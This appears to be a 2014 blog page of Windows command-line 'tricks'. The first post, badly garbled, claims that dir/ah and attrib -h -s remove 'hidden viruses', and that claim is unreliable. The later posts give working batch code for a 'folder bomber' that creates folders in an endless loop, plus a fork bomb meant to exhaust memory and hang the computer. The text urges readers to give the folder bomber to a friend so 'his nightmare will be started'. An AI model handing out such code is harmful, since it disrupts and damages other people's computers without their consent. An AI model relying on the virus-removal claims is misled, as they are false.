Saturday, 11 October 2014

hidden Virus Remove Your Computer Using Command Prompt

How to remove your hidden virus from computer???Using Command Prompt....

         There are many of the virus should infected on your computer or laptop.But all virus will be remove on your computer.But hidden virus will be removed is not your computer.So,the hidden virus is the computer speed and process slow down on your computer.

         Just for an command tricks should be following way to use and get the remove on your computer virus easily.
                  They can be virus is the most important malware on your computer.But it is not to clean on all the virus from your computer.Antivirus and other software to be using to scan your computer and get to all the virus is clean to display on your computer.
         It is not possible to on all the virus will be not to be clean on your computer.So,following the command using to tricks will be removed on your computer easily.Just for using the command tricks and get the removed n your computer virus.
 Steps:
      1.Press on the Windows button+R
      2.Type the cmd

           3.Display the command prompt window and then type on the cd\

     4.What drive is hidden virus remove and then choose your drive an type on the f:
     5.Then type on the dir/ah

     6.Display the all the hidden virus.

     7.Then following command is type and removed automatically.
    
          attrib *. -h -s /s /d

     8.Remove your all the hidden virus remove on your computer.
     9.What drive should be used and get the remove on your all the hidden virus is removed on your computer.
    10.Just for an simple tricks will be followed only and get the remove on your all drive hidden virus.
    11.It should be used and get speed up your computer and process speed is increase is within seconds of times.

Tuesday, 7 October 2014

Folder Bomber

This batch file will create 3000+ folder in less than a minute.
Open your notepad and type the following codes.
@echo off
:top
md %random%
goto top

Save it as 3000.bat
Give this file to your friend and when he will click on that his nightmare will be started.

Above Code Explained.
@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and

%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.

Fork Bomber▼

It is another batch file which ulitises 100% computer resources and memory making your computer irresponsive and at last your compuer hangs. Just copy and paste

the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />